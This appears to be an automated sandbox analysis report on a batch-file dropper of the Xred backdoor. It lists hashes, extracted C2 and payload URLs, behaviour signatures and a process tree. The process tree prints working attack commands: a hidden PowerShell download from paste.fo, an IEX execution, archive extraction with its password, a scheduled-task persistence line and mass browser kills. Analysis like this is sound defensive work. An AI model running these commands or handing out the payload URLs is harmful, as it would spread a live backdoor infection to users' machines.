Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 02:11

General

  • Target

    155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9.bat

  • Size

    41KB

  • MD5

    a2539089ecc2f92f81908c88ab2b2938

  • SHA1

    9a18b58b8fc22ec070434020c537f4bfa5c57973

  • SHA256

    155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9

  • SHA512

    07a1a04a25c9063e8ba14b516b768906b115ae21d1133f01f8f4b7674e512bd876a5109d26aa1d78d91cbf3e7c9c730d6921f6cd95ab0ff5a5f58331a17dad40

  • SSDEEP

    768:OfxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1KcTtb2w80P+RTXH7hhb:qxzLnYe9TQ7lOYSeIAeIF3k54J9Ti1Kx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://paste.fo/raw/024749876411

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 14 IoCs

    AutoIT scripts compiled to PE executables.

  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 12 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/024749876411', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\155b933fb9fe44c971a042e6539d8544616f908960177e7922eee1c943008ab9.bat'))"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3520
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          4⤵
            PID:3132
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/wada123wada/shsfdhdgh/refs/heads/main/NOTICE.zip
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4236
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff4cc346f8,0x7fff4cc34708,0x7fff4cc34718
            4⤵
              PID:1900
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
              4⤵
                PID:2456
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1332
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3368 /prefetch:8
                4⤵
                  PID:2120
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                  4⤵
                    PID:2636
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
                    4⤵
                      PID:1908
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
                      4⤵
                        PID:2548
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3640
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                        4⤵
                          PID:2816
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                          4⤵
                            PID:4408
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4472 /prefetch:8
                            4⤵
                              PID:4232
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
                              4⤵
                                PID:4304
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3796
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
                                4⤵
                                  PID:2720
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2668081951634648080,18412048928150039830,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
                                  4⤵
                                    PID:2012
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 9
                                  3⤵
                                  • Delays execution with timeout.exe
                                  PID:5104
                                • C:\Program Files\7-Zip\7z.exe
                                  "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\NOTICE.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5424
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 9
                                  3⤵
                                  • Delays execution with timeout.exe
                                  PID:5456
                                • C:\Users\Admin\AppData\Local\Temp\Startup\NOTICE.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Startup\NOTICE.exe"
                                  3⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  PID:5752
                                  • C:\Users\Admin\AppData\Local\Temp\._cache_NOTICE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\._cache_NOTICE.exe"
                                    4⤵
                                    • Drops startup file
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • System Location Discovery: System Language Discovery
                                    • NTFS ADS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    PID:5336
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn JTFFUA.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Adobe Reader 9.exe /sc minute /mo 1
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3916
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /tn JTFFUA.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Adobe Reader 9.exe /sc minute /mo 1
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:5900
                                    • C:\Windows\SysWOW64\WSCript.exe
                                      WSCript C:\Users\Admin\AppData\Local\Temp\JTFFUA.vbs
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5748
                                  • C:\ProgramData\Synaptics\Synaptics.exe
                                    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                    4⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Modifies registry class
                                    PID:5664
                                    • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                      5⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:1000
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM chrome.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5764
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM firefox.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5820
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM msedge.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5848
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM iexplore.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5896
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM opera.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5952
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM safari.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3532
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM brave.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5232
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM vivaldi.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3020
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM epic.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:456
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM yandex.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4508
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM tor.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5220
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM CMD.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4956
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4292
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4852
                                • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                  1⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6040

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                  SHA1

                                  445bf1b07223a04f8a159581a3d37d630273010f

                                  SHA256

                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                  SHA512

                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  a0486d6f8406d852dd805b66ff467692

                                  SHA1

                                  77ba1f63142e86b21c951b808f4bc5d8ed89b571

                                  SHA256

                                  c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

                                  SHA512

                                  065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  dc058ebc0f8181946a312f0be99ed79c

                                  SHA1

                                  0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

                                  SHA256

                                  378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

                                  SHA512

                                  36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  f5bb65f4908c5215b262d85fe34d1159

                                  SHA1

                                  7109ae6b0a8c1a49f058a277f17ee40087777127

                                  SHA256

                                  86d951b44443756f143de8f2707e1fbbd1815287cf4185fe269e7336c3ae76e0

                                  SHA512

                                  3cb1b426428f64913e9e2fe42d72b3b88e6aa17f4aad2a59304c4c86aa308ebf00b5c18deba14202aecabf749e8a3010dfd9191290632d1d2d03f70bbd1195e5

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  501145f92ef7f72e82053efa2efe121a

                                  SHA1

                                  73c71c0ccd5a4173479d156b315056ed519388c9

                                  SHA256

                                  6e34276d079294f8c8afa012290209eee20f2a466ea39aa7a67b44e051417192

                                  SHA512

                                  744bfc490da75f76330e5aa361ea02cd00bb153db4157d860367ec1f5be00306a9fe07b850ef985e55d7de3fe4dd0e43b3a3e9583dfb6d1782be9c34742c59d9

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                  Filesize

                                  16B

                                  MD5

                                  6752a1d65b201c13b62ea44016eb221f

                                  SHA1

                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                  SHA256

                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                  SHA512

                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                  Filesize

                                  10KB

                                  MD5

                                  86eafa29f2e48a0817c209c4fa55920d

                                  SHA1

                                  cf12e1c92043b2ca35869bed0ed5002a2337c199

                                  SHA256

                                  c18c0bc0bf2d6688b320fec2e9fd0676f6fb4916629ce6d33fcdbf0498d20081

                                  SHA512

                                  8106414ff669294b1b40b11e1f4ac611751dd8164da2131bafa59a44c2760e04cd56d3c1be9cef37b873b8f62bff8e4dde5914517f4419da3fb87ef26ff462f0

                                • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

                                  Filesize

                                  4KB

                                  MD5

                                  bfc57abd06cc3f5ef4efc7f998951aa1

                                  SHA1

                                  21d344b0d73034f561462c60042188829b916e26

                                  SHA256

                                  05e4550e73bd0fab8a7b03c6a3c4a14676aa45657773510439f9de2c9cbb759c

                                  SHA512

                                  ac97dd2151b79c552bb80d3c6f49d8cc5c432f346f00a5dafc38b6789af6316d580966ddea034975c0c3b00bdd0b8456cf4447253c68e0dda373a5247581903c

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  aa8efa56e1e40374bbd21e0e469dceb7

                                  SHA1

                                  33a592799d4898c6efdd29e132f2f76ec51dbc08

                                  SHA256

                                  25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

                                  SHA512

                                  ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

                                • C:\Users\Admin\AppData\Local\Temp\._cache_NOTICE.exe

                                  Filesize

                                  906KB

                                  MD5

                                  66d2c639cb94ffb0324ca020c3aa4c77

                                  SHA1

                                  929e912f64ea70c7193cd3dadf4ba6ebe22410bd

                                  SHA256

                                  cccec4291b70f56acdd74458d4ea99fe1105d78566ff7f4adf17c0a2f72b4577

                                  SHA512

                                  a09c54e8908902e26bc2f4e8195a049ac6a3c90f1ce8e97351518e7ff3418bfd3daf960d8f6d26ca56c21af3594d768b36151c923b1de166dce31f1a49c6ac3c

                                • C:\Users\Admin\AppData\Local\Temp\JTFFUA.vbs

                                  Filesize

                                  848B

                                  MD5

                                  257c2fa1f0cec2f6ac5f2fb1880258d6

                                  SHA1

                                  841ed468919c26c5b62973f3d22f116295e3d326

                                  SHA256

                                  ba25f6d61b4a66e4c5f80f3fc9258ae3e777d43588025a9f1defa6a0ff6059e0

                                  SHA512

                                  43552c68e7245c3603a234ec350dd0abe038adc3085654b25719290aff55263614f71ac8f5ec87d08bedfe78e355ba732077dc8d00f9147f2a884a7784016cd2

                                • C:\Users\Admin\AppData\Local\Temp\LXTqiM2S.xlsm

                                  Filesize

                                  17KB

                                  MD5

                                  e566fc53051035e1e6fd0ed1823de0f9

                                  SHA1

                                  00bc96c48b98676ecd67e81a6f1d7754e4156044

                                  SHA256

                                  8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

                                  SHA512

                                  a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1xygtfh.2td.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\Downloads\NOTICE.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  ec502b2a35cbfa6aa63e1480e1a74054

                                  SHA1

                                  9eb5ef0a9edf8abdf252f295afc5c96103ad0211

                                  SHA256

                                  68a13d335d1119a9a3587b196170bed280cd76e93bad7322590b3cdf394b601a

                                  SHA512

                                  48adf3b56de68c779033fe3813adcdd2d713af19a369ecfdfc397feb4094fe794843198ee356990728da3bc935091a5e241628a3808c3e1e227ad9bc12186e7b

                                • C:\Users\Admin\Downloads\NOTICE.zip

                                  Filesize

                                  1.2MB

                                  MD5

                                  682240bfe97424830ecfd2765c73bd78

                                  SHA1

                                  0aa17535465812443ac075ddcb7ebe8c55dcfc51

                                  SHA256

                                  7bb1e6b999ec5d64c45083fb6e453a2087c907ba41ad0b8b534796c23227da5d

                                  SHA512

                                  101b2c72afbea01fabf02403b09522757e84c0ffd724f313c9f9889bd01d30ba16875d54e099545316b5ffee4434dee1847a8f64168faa310846e4559740cadc

                                • \??\pipe\LOCAL\crashpad_4236_XSHJGLNDQAPITNIF

                                  MD5

                                  d41d8cd98f00b204e9800998ecf8427e

                                  SHA1

                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                  SHA256

                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                  SHA512

                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                • memory/1000-295-0x00000000006C0000-0x00000000008B4000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/1000-296-0x00000000006C0000-0x00000000008B4000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3520-21-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3520-20-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3520-19-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3520-33-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-11-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-17-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-14-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-13-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-6-0x000002492E070000-0x000002492E092000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/3620-12-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/3620-0-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/5336-330-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-355-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-367-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-365-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

